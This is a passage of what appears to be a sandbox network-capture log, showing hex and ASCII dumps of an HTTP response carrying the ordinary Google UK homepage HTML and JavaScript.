                                                                                                            2022-10-03 15:28:41 UTC26INData Raw: 63 3d 30 3b 62 3d 50 61 5b 63 5d 3b 2b 2b 63 29 28 62 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 62 29 29 26 26 61 2e 70 75 73 68 28 62 29 3b 72 65 74 75 72 6e 20 61 7d 2c 57 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 61 3d 56 61 28 29 3b 72 65 74 75 72 6e 20 30 3c 61 2e 6c 65 6e 67 74 68 3f 61 5b 30 5d 3a 6e 75 6c 6c 7d 2c 58 61 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 5f 37 30 22 29 7d 2c 4b 3d 7b 7d 2c 4c 3d 7b 7d 2c 59 61 3d 7b 7d 2c 4d 3d 7b 7d 2c 4e 3d 76 6f 69 64 20 30 2c 63 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 72 79 7b 76 61 72 20 63 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79
                                                                                                            Data Ascii: c=0;b=Pa[c];++c)(b=document.getElementById(b))&&a.push(b);return a},Wa=function(){var a=Va();return 0<a.length?a[0]:null},Xa=function(){return document.getElementById("gb_70")},K={},L={},Ya={},M={},N=void 0,cb=function(a,b){try{var c=document.getElementBy
                                                                                                            2022-10-03 15:28:41 UTC27INData Raw: 69 6c 64 4e 6f 64 65 73 28 29 29 7b 63 3d 5b 5b 22 67 62 6b 63 22 5d 2c 5b 22 67 62 66 22 2c 22 67 62 65 22 2c 22 67 62 6e 22 5d 2c 5b 22 67 62 6b 70 22 5d 2c 5b 22 67 62 6e 64 22 5d 5d 3b 64 3d 30 3b 76 61 72 20 6e 3d 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 2e 6c 65 6e 67 74 68 3b 66 3d 21 31 3b 66 6f 72 28 76 61 72 20 6d 3d 2d 31 2c 71 2c 53 3d 30 3b 71 3d 63 5b 53 5d 3b 53 2b 2b 29 7b 66 6f 72 28 76 61 72 20 46 3d 76 6f 69 64 20 30 2c 54 3d 30 3b 46 3d 71 5b 54 5d 3b 54 2b 2b 29 7b 66 6f 72 28 3b 64 3c 6e 26 26 48 28 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 5d 2c 46 29 3b 29 64 2b 2b 3b 69 66 28 46 3d 3d 62 29 7b 6b 2e 69 6e 73 65 72 74 42 65 66 6f 72 65 28 6c 2c 6b 2e 63 68 69 6c 64 4e 6f 64 65 73 5b 64 5d 7c 7c 0a 6e 75 6c 6c 29 3b 66 3d 21 30 3b 62 72
                                                                                                            Data Ascii: ildNodes()){c=[["gbkc"],["gbf","gbe","gbn"],["gbkp"],["gbnd"]];d=0;var n=k.childNodes.length;f=!1;for(var m=-1,q,S=0;q=c[S];S++){for(var F=void 0,T=0;F=q[T];T++){for(;d<n&&H(k.childNodes[d],F);)d++;if(F==b){k.insertBefore(l,k.childNodes[d]||null);f=!0;br
                                                                                                            2022-10-03 15:28:41 UTC28INData Raw: 61 6c 75 65 3d 0a 21 31 3b 61 2e 63 61 6e 63 65 6c 42 75 62 62 6c 65 3d 21 30 7d 2c 71 62 3d 6e 75 6c 6c 2c 61 62 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 4f 28 29 3b 69 66 28 61 29 7b 72 62 28 61 2c 22 4f 70 65 6e 69 6e 67 26 68 65 6c 6c 69 70 3b 22 29 3b 50 28 61 2c 21 30 29 3b 62 3d 22 75 6e 64 65 66 69 6e 65 64 22 21 3d 74 79 70 65 6f 66 20 62 3f 62 3a 31 45 34 3b 76 61 72 20 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 73 62 28 61 29 7d 3b 71 62 3d 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 63 2c 62 29 7d 7d 2c 74 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 4f 28 29 3b 61 26 26 28 50 28 61 2c 21 31 29 2c 72 62 28 61 2c 22 22 29 29 7d 2c 73 62 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 74 72 79 7b 4f 28 29 3b 76 61 72 20 62 3d 61 7c 7c 64 6f 63 75
                                                                                                            Data Ascii: alue=!1;a.cancelBubble=!0},qb=null,ab=function(a,b){O();if(a){rb(a,"Opening&hellip;");P(a,!0);b="undefined"!=typeof b?b:1E4;var c=function(){sb(a)};qb=window.setTimeout(c,b)}},tb=function(a){O();a&&(P(a,!1),rb(a,""))},sb=function(a){try{O();var b=a||docu
                                                                                                            2022-10-03 15:28:41 UTC29INData Raw: 2c 4d 29 3b 70 28 22 61 63 68 22 2c 70 62 29 3b 70 28 22 65 68 22 2c 59 61 29 3b 70 28 22 61 65 68 22 2c 6f 62 29 3b 62 61 3d 68 2e 61 28 22 22 29 3f 54 61 3a 55 61 3b 70 28 22 71 73 22 2c 62 61 29 3b 70 28 22 73 65 74 43 6f 6e 74 69 6e 75 65 43 62 22 2c 52 61 29 3b 70 28 22 70 63 22 2c 53 61 29 3b 70 28 22 62 73 79 22 2c 76 62 29 3b 68 2e 64 3d 62 62 3b 68 2e 6a 3d 75 62 3b 76 61 72 20 78 62 3d 7b 7d 3b 77 2e 62 61 73 65 3d 78 62 3b 78 2e 70 75 73 68 28 5b 22 6d 22 2c 7b 75 72 6c 3a 22 2f 2f 73 73 6c 2e 67 73 74 61 74 69 63 2e 63 6f 6d 2f 67 62 2f 6a 73 2f 73 65 6d 5f 38 64 32 38 37 36 38 34 63 38 37 39 31 34 36 35 63 62 34 62 65 61 62 39 36 65 63 63 33 36 64 36 2e 6a 73 22 7d 5d 29 3b 67 2e 73 67 3d 7b 63 3a 22 31 22 7d 3b 70 28 22 77 67 22 2c 7b 72 67
                                                                                                            Data Ascii: ,M);p("ach",pb);p("eh",Ya);p("aeh",ob);ba=h.a("")?Ta:Ua;p("qs",ba);p("setContinueCb",Ra);p("pc",Sa);p("bsy",vb);h.d=bb;h.j=ub;var xb={};w.base=xb;x.push(["m",{url:"//ssl.gstatic.com/gb/js/sem_8d287684c8791465cb4beab96ecc36d6.js"}]);g.sg={c:"1"};p("wg",{rg
                                                                                                            2022-10-03 15:28:41 UTC31INData Raw: 50 31 39 75 67 2d 41 4d 22 29 3b 76 61 72 20 6d 3d 67 2e 62 76 2e 66 2c 71 3d 64 28 22 31 22 29 3b 6e 3d 64 28 6e 29 3b 63 3d 4d 61 74 68 2e 72 6f 75 6e 64 28 31 2f 63 29 3b 76 61 72 20 53 3d 64 28 22 34 37 36 30 35 34 33 33 33 2e 30 22 29 2c 46 3d 22 26 6f 67 67 76 3d 22 2b 64 28 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 32 30 38 30 31 2e 30 5f 70 30 22 29 2c 54 3d 64 28 22 63 6f 6d 22 29 2c 55 3d 64 28 22 65 6e 22 29 2c 56 3d 0a 64 28 22 47 42 52 22 29 3b 76 61 72 20 79 3d 30 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 31 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 32 29 3b 68 2e 61 28 22 22 29 26 26 28 79 7c 3d 34 29 3b 61 3d 5b 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 67 65 6e 5f 32 30 34 3f 61 74 79 70 3d 69 26 7a 78 3d 22 2c
                                                                                                            Data Ascii: P19ug-AM");var m=g.bv.f,q=d("1");n=d(n);c=Math.round(1/c);var S=d("476054333.0"),F="&oggv="+d("es_plusone_gc_20220801.0_p0"),T=d("com"),U=d("en"),V=d("GBR");var y=0;h.a("")&&(y|=1);h.a("")&&(y|=2);h.a("")&&(y|=4);a=["//www.google.com/gen_204?atyp=i&zx=",
                                                                                                            2022-10-03 15:28:41 UTC32INData Raw: 72 3d 73 32 34 22 7d 2c 0a 55 62 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 43 28 66 75 6e 63 74 69 6f 6e 28 29 7b 67 2e 73 70 64 28 29 7d 29 7d 3b 70 28 22 73 70 6e 22 2c 50 62 29 3b 70 28 22 73 70 70 22 2c 52 62 29 3b 70 28 22 73 70 73 22 2c 51 62 29 3b 70 28 22 73 70 64 22 2c 55 62 29 3b 70 28 22 70 61 61 22 2c 4e 62 29 3b 70 28 22 70 72 6d 22 2c 4f 62 29 3b 6d 62 28 22 67 62 64 34 22 2c 4f 62 29 3b 0a 69 66 28 68 2e 61 28 22 22 29 29 7b 76 61 72 20 56 62 3d 7b 64 3a 68 2e 61 28 22 22 29 2c 65 3a 22 22 2c 73 61 6e 77 3a 68 2e 61 28 22 22 29 2c 70 3a 22 68 74 74 70 73 3a 2f 2f 6c 68 33 2e 67 6f 6f 67 6c 65 75 73 65 72 63 6f 6e 74 65 6e 74 2e 63 6f 6d 2f 6f 67 77 2f 64 65 66 61 75 6c 74 2d 75 73 65 72 3d 73 39 36 22 2c 63 70 3a 22 31 22 2c 78 70 3a 68 2e 61 28
                                                                                                            Data Ascii: r=s24"},Ub=function(){C(function(){g.spd()})};p("spn",Pb);p("spp",Rb);p("sps",Qb);p("spd",Ub);p("paa",Nb);p("prm",Ob);mb("gbd4",Ob);if(h.a("")){var Vb={d:h.a(""),e:"",sanw:h.a(""),p:"https://lh3.googleusercontent.com/ogw/default-user=s96",cp:"1",xp:h.a(
                                                                                                            2022-10-03 15:28:41 UTC33INData Raw: 7d 7d 3b 58 62 3d 21 31 3b 52 3d 7b 7d 3b 57 62 3d 7b 7d 3b 57 3d 6e 75 6c 6c 3b 58 3d 31 3b 0a 76 61 72 20 64 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 76 61 72 20 62 3d 21 31 3b 74 72 79 7b 62 3d 61 2e 63 6f 6f 6b 69 65 26 26 61 2e 63 6f 6f 6b 69 65 2e 6d 61 74 63 68 28 22 50 52 45 46 22 29 7d 63 61 74 63 68 28 63 29 7b 7d 72 65 74 75 72 6e 21 62 7d 2c 65 63 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 72 65 74 75 72 6e 21 21 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 26 26 22 6f 62 6a 65 63 74 22 3d 3d 74 79 70 65 6f 66 20 65 2e 6c 6f 63 61 6c 53 74 6f 72 61 67 65 7d 63 61 74 63 68 28 61 29 7b 72 65 74 75 72 6e 21 31 7d 7d 2c 66 63 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 26 26 61 2e 73 74 79 6c 65 26 26 61 2e 73 74 79 6c 65 2e
                                                                                                            Data Ascii: }};Xb=!1;R={};Wb={};W=null;X=1;var dc=function(a){var b=!1;try{b=a.cookie&&a.cookie.match("PREF")}catch(c){}return!b},ec=function(){try{return!!e.localStorage&&"object"==typeof e.localStorage}catch(a){return!1}},fc=function(a){return a&&a.style&&a.style.
                                                                                                            2022-10-03 15:28:41 UTC34INData Raw: 3b 76 61 72 20 5a 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 61 5b 62 5d 3d 66 75 6e 63 74 69 6f 6e 28 63 29 7b 76 61 72 20 64 3d 61 72 67 75 6d 65 6e 74 73 3b 67 2e 71 6d 28 66 75 6e 63 74 69 6f 6e 28 29 7b 61 5b 62 5d 2e 61 70 70 6c 79 28 74 68 69 73 2c 64 29 7d 29 7d 7d 3b 5a 28 67 2e 75 70 2c 22 73 6c 22 29 3b 5a 28 67 2e 75 70 2c 22 73 69 22 29 3b 5a 28 67 2e 75 70 2c 22 73 70 6c 22 29 3b 5a 28 67 2e 75 70 2c 22 64 70 63 22 29 3b 5a 28 67 2e 75 70 2c 22 69 69 63 22 29 3b 67 2e 6d 63 66 28 22 75 70 22 2c 7b 73 70 3a 68 2e 62 28 22 30 2e 30 31 22 2c 31 29 2c 74 6c 64 3a 22 63 6f 2e 75 6b 22 2c 70 72 69 64 3a 22 31 22 7d 29 3b 66 75 6e 63 74 69 6f 6e 20 6c 63 28 29 7b 66 75 6e 63 74 69 6f 6e 20 61 28 29 7b 66 6f 72 28 76 61 72 20 6d 3b 28 6d 3d 6b 5b
                                                                                                            Data Ascii: ;var Z=function(a,b){a[b]=function(c){var d=arguments;g.qm(function(){a[b].apply(this,d)})}};Z(g.up,"sl");Z(g.up,"si");Z(g.up,"spl");Z(g.up,"dpc");Z(g.up,"iic");g.mcf("up",{sp:h.b("0.01",1),tld:"co.uk",prid:"1"});function lc(){function a(){for(var m;(m=k[
                                                                                                            2022-10-03 15:28:41 UTC36INData Raw: 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63 65 6e 73 65 2d 49 64 65 6e 74 69 66 69 65 72 3a 20 41 70 61 63 68 65 2d 32 2e 30 0a 2a 2f 0a 76 61 72 20 61 3d 77 69 6e 64 6f 77 2e 67 62 61 72 3b 61 2e 6d 63 66 28 22 6d 6d 22 2c 7b 73 3a 22 31 22 7d 29 3b 7d 63 61 74 63 68 28 65 29 7b 77 69 6e 64 6f 77 2e 67 62 61 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 26 26 67 62 61 72 2e 6c 6f 67 67 65 72 2e 6d 6c 28 65 2c 7b 22 5f 73 6e 22 3a 22 63 66 67 2e 69 6e 69 74 22 7d 29 3b 7d 7d 29 28 29 3b 0a 28 66 75 6e 63 74 69 6f 6e 28 29 7b 74 72 79 7b 2f 2a 0a 0a 20 43 6f 70 79 72 69 67 68 74 20 54 68 65 20 43 6c 6f 73 75 72 65 20 4c 69 62 72 61 72 79 20 41 75 74 68 6f 72 73 2e 0a 20 53 50 44 58 2d 4c 69 63
                                                                                                            Data Ascii: he Closure Library Authors. SPDX-License-Identifier: Apache-2.0*/var a=window.gbar;a.mcf("mm",{s:"1"});}catch(e){window.gbar&&gbar.logger&&gbar.logger.ml(e,{"_sn":"cfg.init"});}})();(function(){try{/* Copyright The Closure Library Authors. SPDX-Lic
                                                                                                            2022-10-03 15:28:41 UTC37INData Raw: 30 22 2c 65 69 3a 65 28 22 71 66 38 36 59 2d 58 33 46 5a 33 67 31 73 51 50 31 39 75 67 2d 41 4d 22 29 2c 65 6c 65 3a 64 28 22 31 22 29 2c 65 73 72 3a 65 28 22 30 2e 31 22 29 2c 65 76 74 73 3a 5b 22 6d 6f 75 73 65 64 6f 77 6e 22 2c 22 74 6f 75 63 68 73 74 61 72 74 22 2c 22 74 6f 75 63 68 6d 6f 76 65 22 2c 22 77 68 65 65 6c 22 2c 22 6b 65 79 64 6f 77 6e 22 5d 2c 67 62 6c 3a 22 65 73 5f 70 6c 75 73 6f 6e 65 5f 67 63 5f 32 30 32 32 30 38 30 31 2e 30 5f 70 30 22 2c 68 64 3a 22 63 6f 6d 22 2c 68 6c 3a 22 65 6e 22 2c 69 72 70 3a 64 28 22 22 29 2c 70 69 64 3a 65 28 22 31 22 29 2c 0a 73 6e 69 64 3a 65 28 22 32 38 38 33 34 22 29 2c 74 6f 3a 65 28 22 33 30 30 30 30 30 22 29 2c 75 3a 65 28 22 22 29 2c 76 66 3a 22 2e 36 36 2e 22 7d 2c 67 3d 66 2c 68 3d 5b 22 62 6e 64
                                                                                                            Data Ascii: 0",ei:e("qf86Y-X3FZ3g1sQP19ug-AM"),ele:d("1"),esr:e("0.1"),evts:["mousedown","touchstart","touchmove","wheel","keydown"],gbl:"es_plusone_gc_20220801.0_p0",hd:"com",hl:"en",irp:d(""),pid:e("1"),snid:e("28834"),to:e("300000"),u:e(""),vf:".66."},g=f,h=["bnd
                                                                                                            2022-10-03 15:28:41 UTC38INData Raw: 62 74 3e 3c 61 20 63 6c 61 73 73 3d 22 67 62 7a 74 20 67 62 7a 30 6c 20 67 62 70 31 22 20 69 64 3d 67 62 5f 31 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 77 65 62 68 70 3f 74 61 62 3d 77 77 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 73 3e 53 65 61 72 63 68 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 74 3e 3c 61 20 63 6c 61 73 73 3d 67 62 7a 74 20 69 64 3d 67 62 5f 32 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6d 67 68 70 3f 68 6c 3d 65 6e 26 74 61 62 3d 77 69 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73
                                                                                                            Data Ascii: bt><a class="gbzt gbz0l gbp1" id=gb_1 href="https://www.google.co.uk/webhp?tab=ww"><span class=gbtb2></span><span class=gbts>Search</span></a></li><li class=gbt><a class=gbzt id=gb_2 href="https://www.google.co.uk/imghp?hl=en&tab=wi"><span class=gbtb2></s
                                                                                                            2022-10-03 15:28:41 UTC39INData Raw: 22 20 20 61 72 69 61 2d 68 61 73 70 6f 70 75 70 3d 74 72 75 65 20 61 72 69 61 2d 6f 77 6e 73 3d 67 62 64 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 74 62 32 3e 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 69 64 3d 67 62 7a 74 6d 73 20 63 6c 61 73 73 3d 22 67 62 74 73 20 67 62 74 73 61 22 3e 3c 73 70 61 6e 20 69 64 3d 67 62 7a 74 6d 73 31 3e 4d 6f 72 65 3c 2f 73 70 61 6e 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 67 62 6d 61 3e 3c 2f 73 70 61 6e 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 73 63 72 69 70 74 20 6e 6f 6e 63 65 3d 27 52 54 4d 69 41 57 6d 47 6d 39 4c 4a 45 6a 59 75 79 6d 4e 4a 39 41 27 3e 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 67 62 7a 74 6d 27 29 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27
                                                                                                            Data Ascii: " aria-haspopup=true aria-owns=gbd><span class=gbtb2></span><span id=gbztms class="gbts gbtsa"><span id=gbztms1>More</span><span class=gbma></span></span></a><script nonce='RTMiAWmGm9LJEjYuymNJ9A'>document.getElementById('gbztm').addEventListener('click'
                                                                                                            2022-10-03 15:28:41 UTC40INData Raw: 64 65 6f 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 63 6c 61 73 73 3d 67 62 6d 74 20 69 64 3d 67 62 5f 32 35 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 64 6f 63 73 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 64 6f 63 75 6d 65 6e 74 2f 3f 75 73 70 3d 64 6f 63 73 5f 61 6c 63 22 3e 44 6f 63 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 67 62 6d 74 20 67 62 6d 68 22 3e 3c 2f 64 69 76 3e 3c 2f 6c 69 3e 3c 6c 69 20 63 6c 61 73 73 3d 67 62 6d 74 63 3e 3c 61 20 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 2e 75 6b 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2f 70 72 6f 64 75 63 74 73 3f 74 61 62 3d 77 68 22 20 63 6c 61 73
                                                                                                            Data Ascii: deos</a></li><li class=gbmtc><a class=gbmt id=gb_25 href="https://docs.google.com/document/?usp=docs_alc">Docs</a></li><li class=gbmtc><div class="gbmt gbmh"></div></li><li class=gbmtc><a href="https://www.google.co.uk/intl/en/about/products?tab=wh" clas
                                                                                                            2022-10-03 15:28:41 UTC42INData Raw: 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 27 63 6c 69 63 6b 27 2c 20 66 75 6e 63 74 69 6f 6e 20 63 6c 69 63 6b 48 61 6e 64 6c 65 72 28 29 20 7b 20 67 62 61 72 2e 74 67 28 65 76 65 6e 74 2c 74 68 69 73 29 3b 20 7d 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 20 69 64 3d 67 62 64 35 20 61 72 69 61 2d 6f 77 6e 65 72 3d 67 62 67 35 3e 3c 64 69 76 20 63 6c 61 73 73 3d 67 62 6d 63 3e 3c 6f 6c 20 69 64 3d 67 62 6f 6d 20 63 6c 61 73 73 3d 67 62 6d 63 63 3e 3c 6c 69 20 63 6c 61 73 73 3d 22 67 62 6b 63 20 67 62 6d 74 63 22 3e 3c 61 20 20 63 6c 61 73 73 3d 67 62 6d 74 20 68 72 65 66 3d 22 2f 70 72 65 66 65 72 65 6e 63 65 73 3f 68 6c 3d 65 6e 22 3e 53 65 61 72 63 68 20 73 65 74 74 69 6e 67 73 3c 2f 61 3e 3c 2f 6c 69 3e 3c 6c
                                                                                                            Data Ascii: .addEventListener('click', function clickHandler() { gbar.tg(event,this); });</script><div class=gbm id=gbd5 aria-owner=gbg5><div class=gbmc><ol id=gbom class=gbmcc><li class="gbkc gbmtc"><a class=gbmt href="/preferences?hl=en">Search settings</a></li><l
                                                                                                            2022-10-03 15:28:41 UTC43INData Raw: 70 78 20 38 70 78 20 30 20 36 70 78 3b 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 74 6f 70 3b 63 6f 6c 6f 72 3a 23 30 30 30 22 20 61 75 74 6f 63 6f 6d 70 6c 65 74 65 3d 22 6f 66 66 22 20 76 61 6c 75 65 3d 22 22 20 74 69 74 6c 65 3d 22 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 22 20 6d 61 78 6c 65 6e 67 74 68 3d 22 32 30 34 38 22 20 6e 61 6d 65 3d 22 71 22 20 73 69 7a 65 3d 22 35 37 22 3e 3c 2f 64 69 76 3e 3c 62 72 20 73 74 79 6c 65 3d 22 6c 69 6e 65 2d 68 65 69 67 68 74 3a 30 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 64 73 22 3e 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 6c 73 62 62 22 3e 3c 69 6e 70 75 74 20 63 6c 61 73 73 3d 22 6c 73 62 22 20 76 61 6c 75 65 3d 22 47 6f 6f 67 6c 65 20 53 65 61 72 63 68 22 20 6e 61 6d 65 3d 22 62 74 6e 47 22 20 74 79 70 65
                                                                                                            Data Ascii: px 8px 0 6px;vertical-align:top;color:#000" autocomplete="off" value="" title="Google Search" maxlength="2048" name="q" size="57"></div><br style="line-height:0"><span class="ds"><span class="lsbb"><input class="lsb" value="Google Search" name="btnG" type
                                                                                                            2022-10-03 15:28:41 UTC44INData Raw: 2b 2b 5d 3b 29 74 72 79 7b 6e 65 77 20 41 63 74 69 76 65 58 4f 62 6a 65 63 74 28 64 29 2c 62 3d 22 32 22 7d 63 61 74 63 68 28 68 29 7b 7d 7d 61 3d 62 3b 69 66 28 22 32 22 3d 3d 61 26 26 2d 31 3d 3d 6c 6f 63 61 74 69 6f 6e 2e 73 65 61 72 63 68 2e 69 6e 64 65 78 4f 66 28 22 26 67 62 76 3d 32 22 29 29 7b 76 61 72 20 66 3d 67 6f 6f 67 6c 65 2e 67 62 76 75 2c 67 3d 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 67 62 76 22 29 3b 67 26 26 28 67 2e 76 61 6c 75 65 3d 61 29 3b 66 26 26 77 69 6e 64 6f 77 2e 73 65 74 54 69 6d 65 6f 75 74 28 66 75 6e 63 74 69 6f 6e 28 29 7b 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 66 7d 2c 30 29 7d 3b 7d 29 2e 63 61 6c 6c 28 74 68 69 73 29 3b 3c 2f 73 63 72 69 70 74 3e 3c 2f 66 6f 72 6d 3e 3c 64 69 76 20
                                                                                                            Data Ascii: ++];)try{new ActiveXObject(d),b="2"}catch(h){}}a=b;if("2"==a&&-1==location.search.indexOf("&gbv=2")){var f=google.gbvu,g=document.getElementById("gbv");g&&(g.value=a);f&&window.setTimeout(function(){location.href=f},0)};}).call(this);</script></form><div
                                                                                                            2022-10-03 15:28:41 UTC45INData Raw: 7a 65 3a 31 30 70 74 22 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 31 39 70 78 20 61 75 74 6f 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 63 65 6e 74 65 72 22 20 69 64 3d 22 57 71 51 41 4e 62 22 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 61 64 73 2f 22 3e 41 64 76 65 72 74 69 73 69 6e 67 a0 50 72 6f 67 72 61 6d 6d 65 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 2f 73 65 72 76 69 63 65 73 2f 22 3e 42 75 73 69 6e 65 73 73 20 53 6f 6c 75 74 69 6f 6e 73 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 2f 69 6e 74 6c 2f 65 6e 2f 61 62 6f 75 74 2e 68 74 6d 6c 22 3e 41 62 6f 75 74 20 47 6f 6f 67 6c 65 3c 2f 61 3e 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 73 65 74 70 72 65 66 64 6f 6d 61 69 6e 3f 70
                                                                                                            Data Ascii: ze:10pt"><div style="margin:19px auto;text-align:center" id="WqQANb"><a href="/intl/en/ads/">AdvertisingProgrammes</a><a href="/services/">Business Solutions</a><a href="/intl/en/about.html">About Google</a><a href="https://www.google.com/setprefdomain?p
                                                                                                            2022-10-03 15:28:41 UTC47INData Raw: 72 73 5c 78 33 64 41 43 54 39 30 6f 47 64 72 64 51 4e 47 34 54 4b 39 4c 38 33 41 49 78 30 4a 2d 57 6e 78 46 54 73 44 77 2f 6d 5c 78 33 64 73 62 5f 68 65 2c 64 27 3b 0a 76 61 72 20 64 3d 74 68 69 73 7c 7c 73 65 6c 66 2c 65 3d 66 75 6e 63 74 69 6f 6e 28 61 29 7b 72 65 74 75 72 6e 20 61 7d 3b 0a 76 61 72 20 67 3b 76 61 72 20 6c 3d 66 75 6e 63 74 69 6f 6e 28 61 2c 62 29 7b 74 68 69 73 2e 67 3d 62 3d 3d 3d 68 3f 61 3a 22 22 7d 3b 6c 2e 70 72 6f 74 6f 74 79 70 65 2e 74 6f 53 74 72 69 6e 67 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 67 2b 22 22 7d 3b 76 61 72 20 68 3d 7b 7d 3b 66 75 6e 63 74 69 6f 6e 20 6e 28 29 7b 76 61 72 20 61 3d 75 3b 67 6f 6f 67 6c 65 2e 6c 78 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 70 28 61 29 3b 67 6f 6f 67 6c 65
                                                                                                            Data Ascii: rs\x3dACT90oGdrdQNG4TK9L83AIx0J-WnxFTsDw/m\x3dsb_he,d';var d=this||self,e=function(a){return a};var g;var l=function(a,b){this.g=b===h?a:""};l.prototype.toString=function(){return this.g+""};var h={};function n(){var a=u;google.lx=function(){p(a);google
                                                                                                            2022-10-03 15:28:41 UTC48INData Raw: 6d 74 6e 3a 30 2c 65 6e 64 3a 30 2c 69 6e 65 3a 66 61 6c 73 65 2c 69 6e 6a 73 3a 27 6e 6f 6e 65 27 2c 69 6e 6a 74 3a 30 2c 69 6e 6a 74 68 3a 30 2c 69 6e 6a 76 32 3a 66 61 6c 73 65 2c 6c 6c 73 3a 27 64 65 66 61 75 6c 74 27 2c 70 64 74 3a 30 2c 72 65 70 3a 30 2c 73 6e 65 74 3a 74 72 75 65 2c 73 74 72 74 3a 30 2c 75 62 6d 3a 66 61 6c 73 65 2c 75 77 70 3a 74 72 75 65 7d 3b 7d 29 28 29 3b 28 66 75 6e 63 74 69 6f 6e 28 29 7b 76 61 72 20 70 6d 63 3d 27 7b 5c 78 32 32 64 5c 78 32 32 3a 7b 7d 2c 5c 78 32 32 73 62 5f 68 65 5c 78 32 32 3a 7b 5c 78 32 32 61 67 65 6e 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 63 67 65 6e 5c 78 32 32 3a 74 72 75 65 2c 5c 78 32 32 63 6c 69 65 6e 74 5c 78 32 32 3a 5c 78 32 32 68 65 69 72 6c 6f 6f 6d 2d 68 70 5c 78 32 32 2c 5c 78 32 32 64
                                                                                                            Data Ascii: mtn:0,end:0,ine:false,injs:'none',injt:0,injth:0,injv2:false,lls:'default',pdt:0,rep:0,snet:true,strt:0,ubm:false,uwp:true};})();(function(){var pmc='{\x22d\x22:{},\x22sb_he\x22:{\x22agen\x22:true,\x22cgen\x22:true,\x22client\x22:\x22heirloom-hp\x22,\x22d
                                                                                                            2022-10-03 15:28:41 UTC49INData Raw: 30 0d 0a 0d 0a
                                                                                                            Data Ascii: 0


